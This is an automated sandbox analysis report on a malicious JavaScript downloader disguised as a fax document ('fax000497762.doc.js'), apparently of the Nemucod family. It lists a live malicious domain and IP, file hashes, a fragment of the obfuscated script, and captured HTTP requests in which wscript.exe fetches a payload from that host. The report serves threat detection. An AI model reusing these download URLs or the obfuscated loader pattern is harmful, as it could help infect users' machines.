http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017	wscript.exe, 00000001.00000002.281080038.000002356DC84000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280032568.000002356DC78000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280048553.000002356DC7F000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280658444.000002356DC84000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280401912.000002356DC83000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://kennedy.sitoserver.com/counter/?id=5552505E160B060116101724160	wscript.exe, 00000001.00000003.280560819.000002356DD26000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280564368.000002356DD2A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280975608.000002356C205000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.280557224.000002356DD22000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279770126.000002356C20B000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280150519.000002356C20C000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280055761.000002356C20C000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://code.jquery.com/jquery-3.3.1.min.js	wscript.exe, 00000001.00000003.279703807.000002356DD41000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280508797.000002356E5FE000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279681430.000002356E608000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281218319.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281204027.000002356E601000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280467865.000002356DE65000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281209766.000002356E60A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279543403.000002356E653000.00000004.00000001.sdmp, 7997552.exe.1.dr, 7997553.exe.1.dr, 7997551.exe.1.dr, 404[1].htm.1.dr	false		high
http://gmpg.org/xfn/11	wscript.exe, 00000001.00000003.279703807.000002356DD41000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280508797.000002356E5FE000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279681430.000002356E608000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281218319.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281204027.000002356E601000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280467865.000002356DE65000.00000004.00000040.sdmp, wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281209766.000002356E60A000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.279543403.000002356E653000.00000004.00000001.sdmp, 7997552.exe.1.dr, 7997553.exe.1.dr, 7997551.exe.1.dr, 404[1].htm.1.dr	false		high
http://kennedy.sitoserver.com/counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E06	wscript.exe, 00000001.00000003.279575277.000002356E618000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280903053.000002356BFCF000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.280939026.000002356C043000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280155787.000002356BF9F000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280272890.000002356C02D000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.281213034.000002356E60E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280199684.000002356C02D000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.280429591.000002356BFA8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
143.95.80.178	kennedy.sitoserver.com	United States		62729	ASMALLORANGE1US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	547318
Start date:	03.01.2022
Start time:	11:46:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	fax000497762.doc.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.evad.winJS@4/4@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56 Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
143.95.80.178	VM Tue_Oct_8_2019_7126192.html	Get hash	malicious	Browse
143.95.80.178	Fin-Report-xls-19.html	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
kennedy.sitoserver.com	fax000497762.doc.js	Get hash	malicious	Browse	143.95.78.227

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASMALLORANGE1US	AOtiJ2KF7G	Get hash	malicious	Browse	129.121.147.153
	sora.arm7	Get hash	malicious	Browse	149.47.117.198
	Z6UfOonRHz	Get hash	malicious	Browse	143.95.141.27
	sys.x86_64	Get hash	malicious	Browse	143.95.64.49
	Linux_x86	Get hash	malicious	Browse	129.121.24.160
	sample.doc.doc	Get hash	malicious	Browse	143.95.80.83
	TT COPY_02101011.exe	Get hash	malicious	Browse	143.95.80.65
	rfq.exe	Get hash	malicious	Browse	143.95.232.76
	92zg0G2xll.exe	Get hash	malicious	Browse	143.95.1.174
	TT_0034578218845301 Advice.xlsx	Get hash	malicious	Browse	143.95.1.174
	x86_64	Get hash	malicious	Browse	149.47.223.178
	61Wq3BOwiA.exe	Get hash	malicious	Browse	143.95.1.174
	8H68oST12O.exe	Get hash	malicious	Browse	143.95.1.174
	Order_Specification_10282021.pdf.exe	Get hash	malicious	Browse	143.95.232.76
	test1.test.dll	Get hash	malicious	Browse	143.95.83.72
	test1.test.dll	Get hash	malicious	Browse	143.95.83.72
	Enquiry docs.exe	Get hash	malicious	Browse	143.95.1.174
	FILE-135288.doc	Get hash	malicious	Browse	143.95.76.237
	FILE-135288.doc	Get hash	malicious	Browse	143.95.76.237
	Scan_Order_Specification_DHL.exe	Get hash	malicious	Browse	143.95.232.76

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\404[1].htm Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	11816
Entropy (8bit):	5.037139572888145
Encrypted:	false
SSDEEP:	192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
MD5:	A8063BD37D3C8FB3176A6BF140558A4D
SHA1:	E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
SHA-256:	BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
SHA-512:	82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #

C:\Users\user\AppData\Local\Temp\7997551.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	11816
Entropy (8bit):	5.037139572888145
Encrypted:	false
SSDEEP:	192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
MD5:	A8063BD37D3C8FB3176A6BF140558A4D
SHA1:	E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
SHA-256:	BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
SHA-512:	82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #

C:\Users\user\AppData\Local\Temp\7997552.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	11816
Entropy (8bit):	5.037139572888145
Encrypted:	false
SSDEEP:	192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
MD5:	A8063BD37D3C8FB3176A6BF140558A4D
SHA1:	E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
SHA-256:	BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
SHA-512:	82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #

C:\Users\user\AppData\Local\Temp\7997553.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	11816
Entropy (8bit):	5.037139572888145
Encrypted:	false
SSDEEP:	192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
MD5:	A8063BD37D3C8FB3176A6BF140558A4D
SHA1:	E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
SHA-256:	BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
SHA-512:	82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
Malicious:	true
Reputation:	low
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #

Static File Info

General
File type:	ASCII text, with very long lines, with no line terminators
Entropy (8bit):	4.88779835285313
TrID:
File name:	fax000497762.doc.js
File size:	5393
MD5:	b0891ad5d08b7d59615d8f67eacd52da
SHA1:	bff576d43e5f94988ef05f6bec384fcdb590ed1f
SHA256:	c410086a1075dc1210aa7e2ff8f3040d860ca7c98e8805ff5e29b4c1617cbce4
SHA512:	343b39d31bfb37a25960a7a4b9d98e67e05277be7774bcede024c2b98cc8af4793203d867652ac430c7073849e258b1e2aaa133242bf45232aa9adb37cb3a636
SSDEEP:	96:xagkQUCBQP13A9M3KUFHQBjq/EPO9FiHUyIB:xazC1WfEPOAxm
File Content Preview:	var str="5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55";function b8(){return '+Stri';};function l0(){return 'r (var ';};function e8(){return 'MP%")';};function l1(){return 'nmentS';};function

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/03/22-11:46:49.988556	TCP	2022483	ET TROJAN JS/Nemucod requesting EXE payload 2016-01-28	49749	80	192.168.2.3	143.95.80.178
01/03/22-11:46:51.217203	TCP	2022483	ET TROJAN JS/Nemucod requesting EXE payload 2016-01-28	49749	80	192.168.2.3	143.95.80.178
01/03/22-11:46:51.856111	TCP	2022483	ET TROJAN JS/Nemucod requesting EXE payload 2016-01-28	49749	80	192.168.2.3	143.95.80.178

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2022 11:46:49.839149952 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:49.987904072 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:49.988138914 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:49.988555908 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.135839939 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.215742111 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.219130993 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.221277952 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.221451998 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.225130081 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.374226093 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.378914118 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.378968000 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.379012108 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.379045963 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:50.379098892 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.379137993 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:50.379144907 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.217202902 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.405426979 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:51.443701029 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:51.443880081 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.450217009 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:51.450365067 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.452420950 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.599618912 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:51.603988886 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:51.604089022 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:51.856111050 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:52.047607899 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:52.085560083 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:52.085762024 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:52.092039108 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:52.092175961 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:52.112559080 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:52.259756088 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:52.263277054 CET	80	49749	143.95.80.178	192.168.2.3
Jan 3, 2022 11:46:52.263376951 CET	49749	80	192.168.2.3	143.95.80.178
Jan 3, 2022 11:46:53.467140913 CET	49749	80	192.168.2.3	143.95.80.178

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2022 11:46:49.795470953 CET	53910	53	192.168.2.3	8.8.8.8
Jan 3, 2022 11:46:49.825225115 CET	53	53910	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 3, 2022 11:46:49.795470953 CET	192.168.2.3	8.8.8.8	0x9f56	Standard query (0)	kennedy.sitoserver.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 3, 2022 11:46:49.825225115 CET	8.8.8.8	192.168.2.3	0x9f56	No error (0)	kennedy.sitoserver.com		143.95.80.178	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

kennedy.sitoserver.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49749	143.95.80.178	80	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2022 11:46:49.988555908 CET	1134	OUT	GET /counter/?id=5552505E160B0601161017241605070F17140507014A070B095E3C5E060A1E4A070B094A091D5E17555E555050525C50505555505E55&rnd=3090341 HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive
Jan 3, 2022 11:46:50.215742111 CET	1134	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 03 Jan 2022 10:46:50 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Location: /404.html Cache-Control: no-cache Keep-Alive: timeout=5, max=75 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
Jan 3, 2022 11:46:50.221277952 CET	1134	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 3, 2022 11:46:50.225130081 CET	1135	OUT	GET /404.html HTTP/1.1 Accept: / Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kennedy.sitoserver.com Connection: Keep-Alive
Jan 3, 2022 11:46:50.378914118 CET	1136	IN	HTTP/1.1 200 OK Date: Mon, 03 Jan 2022 10:46:50 GMT Server: Apache Last-Modified: Tue, 17 Aug 2021 05:51:21 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Cache-Control: no-cache Content-Length: 4677 Keep-Alive: timeout=5, max=74 Connection: Keep-Alive Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61 db 90 ef 66 51 6d 42 3c ff 71 d3 a2 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3 17 bf 26 87 2f 56 43 53 84 7b 98 88 e4 2e 37 54 eb b4 bf 38 87 cf fd bf 11 0b 31 29 Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.\|~l'\|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<qMZq0&VkI&;A}mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81)
Jan 3, 2022 11:46:50.378968000 CET	1137	IN	Data Raw: f2 c2 cf d5 1c 2c 29 99 f2 56 8a 87 e9 e1 08 2a 91 a6 52 e7 43 78 ce 7b 6b 7f 5f d6 68 0b 54 ea fe 21 64 6e 44 33 da c1 62 a2 78 69 04 dd db ac 90 0e bf 1a 78 1c 05 b3 c7 cb 85 c7 71 54 a0 48 c7 8f e3 09 a5 0d ff a4 72 0a 32 3d e9 2d 63 ed ad 0e Data Ascii: ,)VRCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=86CG]__^g^v/o[[iG^6\|h7+(Dk3Aa0;,%\Errk
